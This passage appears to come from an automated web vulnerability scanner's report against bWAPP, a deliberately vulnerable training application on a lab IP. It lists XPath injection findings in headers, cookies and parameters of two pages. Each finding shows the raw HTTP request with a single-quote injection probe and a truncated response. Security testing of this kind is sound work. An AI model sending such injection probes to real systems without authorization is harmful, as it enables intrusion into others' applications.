<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.18. http://192.168.52.147/bWAPP/ba_forgotten.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:35 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.19. http://192.168.52.147/bWAPP/ba_forgotten.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:30 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.20. http://192.168.52.147/bWAPP/ba_forgotten.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.21. http://192.168.52.147/bWAPP/ba_forgotten.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.22. http://192.168.52.147/bWAPP/ba_forgotten.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:09 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.23. http://192.168.52.147/bWAPP/ba_forgotten.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12977

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.24. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.25. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:11 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.26. http://192.168.52.147/bWAPP/ba_forgotten.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.27. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.28. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12974

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.29. http://192.168.52.147/bWAPP/ba_forgotten.php [top_security_nossl cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.30. http://192.168.52.147/bWAPP/ba_insecure_login.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:51 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.31. http://192.168.52.147/bWAPP/ba_insecure_login.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.32. http://192.168.52.147/bWAPP/ba_insecure_login.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.33. http://192.168.52.147/bWAPP/ba_insecure_login.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.34. http://192.168.52.147/bWAPP/ba_insecure_login.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
